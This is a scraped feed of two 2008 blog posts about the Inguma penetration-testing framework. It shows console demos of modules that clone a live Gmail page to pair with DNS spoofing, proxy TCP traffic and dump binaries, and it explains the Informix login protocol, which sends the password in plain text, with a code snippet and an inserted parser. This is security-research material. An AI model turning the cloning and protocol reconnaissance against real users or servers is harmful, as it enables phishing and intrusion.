<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijDe8oedKGLs3IpXVbr9SERWIDKFWMcLr7GJdW5hjjCQ5P6kCzmJssCX39F6nEm1bf2-J3dwOyco0tJYFoFbog8rRz3eMq-7MC-oS8EQ73gO7McTHWcIxFPbETEhi4JazDx51cY4Ix8ogO/s1600-h/example2.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px; height: 270px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijDe8oedKGLs3IpXVbr9SERWIDKFWMcLr7GJdW5hjjCQ5P6kCzmJssCX39F6nEm1bf2-J3dwOyco0tJYFoFbog8rRz3eMq-7MC-oS8EQ73gO7McTHWcIxFPbETEhi4JazDx51cY4Ix8ogO/s320/example2.jpg" alt="" id="BLOGGER_PHOTO_ID_5284519644931536674" border="0" /></a><br />
</span>Inguma Bloghttp://www.blogger.com/profile/11808896702980279168noreply@blogger.com0tag:blogger.com,1999:blog-8320914018667085850.post-15358411285532931772008-09-09T23:37:00.001+02:002011-08-15T05:13:10.174+02:00More toys for IngumaHi all,<br />
<br />
Over the last few days we have kept working on more modules for Inguma, so let's see the result of this work.<br />
<br />
First we have two new modules that could be very useful when used together with the DnsSpoof; both modules are located under the Gather category and are a TCP proxy and a Web Server with some basic crawling capabilities.<br />
<pre>inguma> info webserver
crawl = <True/False>
target = <target URL to crawl if True>
port = <server port>
inguma> info tcpproxy
target = <target host or network>
port = <target port>
newport = <new target port>
inguma>
</pre><br />
The web server will crawl a web page, if the crawl variable is set to 'True', and after that it will start serving that page on the specified port.<br />
<pre>inguma> info webserver
crawl = <True/False>
target = <target URL to crawl if True>
port = <server port>
inguma> crawl = True
inguma> target = 'http://mail.google.com'
inguma> port = 80
inguma> webserver
Crawl True
Crawling page: http://mail.google.com
Parsing image links...
Parsing href links...
Crawled page saved at /home/hteso/Proyectos/inguma-dev/data/web/index.html
serving at port 80
localhost - - [09/Sep/2008 23:08:17] "GET / HTTP/1.1" 200 -
localhost - - [09/Sep/2008 23:08:17] "GET /favicon.ico HTTP/1.1" 404 -
</pre><br />
This can be funny ;) <br />
<br />
On the other hand we have the TCP Proxy...<br />
<pre>inguma> info tcpproxy
target = <target host or network>
port = <target port>
newport = <new target port>
inguma> target = 'http://www.google.es'
inguma> port = 80
inguma> newport = 80
inguma> tcpproxy
Starting TCP proxy
Redirecting: localhost:80 -> http://mail.google.com:80
inguma> Creating new session for 127.0.0.1 55231
Creating new pipe thread <PipeThread(Thread-2, initial)> ( ('127.0.0.1', 55231) -> ('74.125.39.104', 80) )
1 pipes active
Creating new pipe thread <PipeThread(Thread-3, initial)> ( ('74.125.39.104', 80) -> ('127.0.0.1', 55231) )
2 pipes active
0010 6D 65 74 61 20 68 74 74 70 2D 65 71 75 69 76 3D meta http-equiv=
0020 22 63 6F 6E 74 65 6E 74 2D 74 79 70 65 22 20 63 "content-type" c
0030 6F 6E 74 65 6E 74 3D 22 74 65 78 74 2F 68 74 6D ontent="text/htm
0040 6C 3B 63 68 61 72 73 65 74 3D 75 74 66 2D 38 22 l;charset=utf-8"
0080 79 20 7B 66 6F 6E 74 2D 66 61 6D 69 6C 79 3A 20 y {font-family:
0090 61 72 69 61 6C 2C 73 61 6E 73 2D 73 65 72 69 66 arial,sans-serif
...
</pre><br />
One of the next improvements for this module will be the ability to trap and modify requests and answers.<br />
<br />
Finally we have added a new section called RCE that will group all the tools for working with binaries:<br />
<pre>inguma> show rce
List of rce modules
-------------------
debugger Userland Debugger
hexdump A simple HexDump utility
</pre><br />
The first tool is a simple Hexdump utility.<br />
<pre>inguma> info hexdump
target = < Target file >
lines = <lines per page of dump>
inguma> target = '/bin/cat'
inguma> hexdump
/bin/cat
--------------------------------------------------------------------------
000000: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 | ELF............
000010: 02 00 03 00 01 00 00 00 c0 8c 04 08 34 00 00 00 | ........�...4...
000020: 78 66 00 00 00 00 00 00 34 00 20 00 07 00 28 00 | xf......4. ...(.
000030: 1b 00 1a 00 06 00 00 00 34 00 00 00 34 80 04 08 | ........4...4...
000040: 34 80 04 08 e0 00 00 00 e0 00 00 00 05 00 00 00 | 4...�...�.......
000050: 04 00 00 00 03 00 00 00 14 01 00 00 14 81 04 08 | ................
000060: 14 81 04 08 13 00 00 00 13 00 00 00 04 00 00 00 | ................
000070: 01 00 00 00 01 00 00 00 00 00 00 00 00 80 04 08 | ................
000080: 00 80 04 08 c0 63 00 00 c0 63 00 00 05 00 00 00 | ....�c..�c......
000090: 00 10 00 00 01 00 00 00 c0 63 00 00 c0 f3 04 08 | ........�c..�
0000a0: c0 f3 04 08 dc 01 00 00 64 03 00 00 06 00 00 00 | ��..�...d.......
0000b0: 00 10 00 00 02 00 00 00 d4 63 00 00 d4 f3 04 08 | ........�c..�
0000c0: d4 f3 04 08 d0 00 00 00 d0 00 00 00 06 00 00 00 | ��..�...�.......
0000d0: 04 00 00 00 04 00 00 00 28 01 00 00 28 81 04 08 | ........(...(...
0000e0: 28 81 04 08 20 00 00 00 20 00 00 00 04 00 00 00 | (... ... .......
0000f0: 04 00 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 | ....Q�td........
000100: 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 | ................
000110: 04 00 00 00 2f 6c 69 62 2f 6c 64 2d 6c 69 6e 75 | ..../lib/ld-linu
000120: 78 2e 73 6f 2e 32 00 00 04 00 00 00 10 00 00 00 | x.so.2..........
--------------------------------------------------------------------------
jump to...
</pre><br />
And the last tool that we will review today is a ring 3 debugger coded in Python that you can find on <a href="http://www.kenshoto.com/vtrace/">this</a> web site.<br />
<pre>inguma> debugger
Loading VDB Modules:
... Complete
vdb > help
Documented commands (type help <topic>):
========================================
alias bpedit config fds maps mode regs snapshot threads
attach break detach go mem ps script stepi vstruct
bestname bt dis ignore memdump python server struct writemem
bp call exec lm meta quit signal syms
Undocumented commands:
======================
EOF help sections
vdb > ps
[Pid] [ Name ]
1 /sbin/init
2764 /sbin/udevd --daemon
4458 /sbin/portmap
4482 /sbin/rpc.statd
4611 /sbin/getty 38400 tty4
4612 /sbin/getty 38400 tty5
4614 /sbin/getty 38400 tty2
4617 /sbin/getty 38400 tty3
4618 /sbin/getty 38400 tty6
4813 /usr/sbin/acpid -c /etc/acpi/events -s /var/run/acpid.socket
...
</pre><br />
Currently the module just starts the debugger (either in console or graphical mode), but we are working on a deeper integration of the tool with Inguma and, maybe, a programmatic RCE environment with the debugger, OpenDis, ...<br />
<br />
That's all for the moment, stay tuned!!<br />
<br />
Hugo TesoInguma Bloghttp://www.blogger.com/profile/11808896702980279168noreply@blogger.com1tag:blogger.com,1999:blog-8320914018667085850.post-51570546905320354862008-08-31T19:05:00.002+02:002011-08-15T05:12:33.525+02:00New libraries in the Inguma FrameworkHi!<br />
<br />
The new version of Inguma, currently in development, will include modules for Informix and IBM DB2 databases. Right now, for <a href="http://www.ibm.com/db2">IBM DB2</a> databases we don't have many things, just a discover module (at the moment), but I'm working on a Python module for the <a href="http://en.wikipedia.org/wiki/DRDA">DRDA protocol</a>.<br />
<br />
Also, and it's almost finished, I'm working on a pure Python <a href="http://www.ibm.com/software/data/informix/">Informix</a> library. This library just "works". It generates valid packets for login, queries and various other Informix commands (such as DBList, etc...). It wasn't a hard job! I will explain a bit how the Informix communication protocol works: <br />
<br />
The 1st packet the client sends to the database server is a pure ASCII packet with the following format: <br />
<pre>import base64

# Header: the packet size is base64 encoded and its '=' padding stripped
buf = "sq"
buf += base64.b64encode("<b>the total size of the packet</b>").strip("==")
buf += "BPQAAsqlexec"

# Login data: plain ASCII, including the password after "-p"
data = ' %s -p%s %s %s -d%s -f%s DBPATH=%s DBMONEY=%s CLIENT_LOCALE=%s'
data += ' SINGLELEVEL=%s '
data += 'LKNOTIFY=%s LOCKDOWN=%s NODEFDAC=%s CLNT_PAM_CAPABLE=%s '
data = data % (self.username, self.password, self.version, self.serialNumber,
               self.databaseName,
               self.ieee, self.databasePath, self.databaseMoney,
               self.clientLocale,
               self.singleLevel, self.lkNotify, self.lockDown,
               self.noDefDac,
               self.clientPamCapable)
</pre><br />
When the server receives this packet it validates the username and the password (which is, BTW, sent in plain text) and, also, the database name if it was passed. Regardless of whether the username and password are valid, the server will always answer with interesting data to the client, such as the install path, complete version, etc... (BTW, there is a working module to gather information from an Informix Database in the private version of Inguma and it will be released in the next release).<br />
<br />
The response sent from the server to the client will have the following format: <br />
<br />
<i>"0x00 0x05 0x02 0x00*12 ieee name banner serial dbpath protocol hostname terminal installpath"</i><br />
<br />
The first byte (0x00 or 0x01) is the "isValidUser" byte. If the username and password are OK, the server will answer with a value of 0x01. Otherwise, the value will be 0x0. The 2nd and 3rd bytes indicate whether the selected database exists and the user has the privilege to connect to it. A normal answer (if the database exists and, also, the username & password are both valid) is 0x05 0x02. All the rest of the data are C strings. <br />
<br />
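The response layout described above can be turned into a small parser, which also makes visible how much the server reveals when the login is rejected. This is an added example, not code from Inguma: it assumes that "0x00*12" means twelve zero bytes and that every string is NUL-terminated, and the sample response is constructed, not captured traffic.

```python
from dataclasses import dataclass

# Order of the C strings, exactly as listed in the post.
STRING_FIELDS = ("ieee", "name", "banner", "serial", "dbpath",
                 "protocol", "hostname", "terminal", "installpath")
PADDING_LEN = 12                 # assumption: "0x00*12" = twelve zero bytes
HEADER_LEN = 3 + PADDING_LEN     # isValidUser + 2 status bytes + padding


class ResponseError(ValueError):
    """The buffer does not match the layout described in the post."""


@dataclass
class LoginResponse:
    valid_user: bool     # first byte: 0x01 if the credentials were accepted
    db_status: bytes     # 2nd and 3rd bytes
    strings: dict        # the NUL-terminated strings, by field name

    @property
    def database_ok(self):
        # The post gives 0x05 0x02 as the normal answer.
        return self.db_status == b"\x05\x02"

    def disclosed_on_failure(self):
        """Non-empty fields the server returned although the login failed."""
        if self.valid_user:
            return {}
        return {k: v for k, v in self.strings.items() if v}


def parse_login_response(buf: bytes) -> LoginResponse:
    if len(buf) < HEADER_LEN:
        raise ResponseError("short header")
    if buf[0] not in (0x00, 0x01):
        raise ResponseError("unexpected isValidUser byte: 0x%02x" % buf[0])
    if buf[3:HEADER_LEN] != b"\x00" * PADDING_LEN:
        raise ResponseError("non-zero padding")
    strings = {}
    pos = HEADER_LEN
    for name in STRING_FIELDS:
        end = buf.find(b"\x00", pos)
        if end == -1:            # truncated packet: string never terminated
            raise ResponseError("unterminated string: " + name)
        strings[name] = buf[pos:end].decode("latin-1")
        pos = end + 1
    return LoginResponse(buf[0] == 0x01, buf[1:3], strings)


def build_sample(valid: bool) -> bytes:
    """Constructed sample response; all values are placeholders."""
    values = [b"IEEEI", b"demo_srv", b"Example Server Version 0.0",
              b"SERIAL-0000", b"/data", b"sqlexec", b"dbhost",
              b"tty0", b"/opt/example"]
    head = bytes([1 if valid else 0, 0x05, 0x02]) + b"\x00" * PADDING_LEN
    return head + b"".join(v + b"\x00" for v in values)


if __name__ == "__main__":
    resp = parse_login_response(build_sample(valid=False))
    print("login accepted:", resp.valid_user)
    for field, value in resp.disclosed_on_failure().items():
        print("  disclosed %-12s %s" % (field, value))
```
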
After this, if both username and password are valid, the user may start sending commands in a new (binary) protocol format. The protocol will have the following structure (not 100% accurate...): <br />
<br />
<i>0x00 OPCODE 0x00 0x00 0x00 STRING_DATA 0x00 0x00 0x16 0x00 0x31 0x00 0x0c</i><br />
<br />
The first byte is static and the second one is the OPCODE. The opcode is an index into an internal function pointer array. For example, the OPCODE 0x01 is for executing SQL commands, the OPCODE chr(26) will list all the databases in the server, etc. These function pointers are stored in the global array "jmpsql".<br />
<br />
Well, I hope that we will release a new version in about 1 month or so with modules for DB2 and Informix.<br />
<br />
Regards,<br />
Joxean KoretInguma Bloghttp://www.blogger.com/profile/11808896702980279168noreply@blogger.com0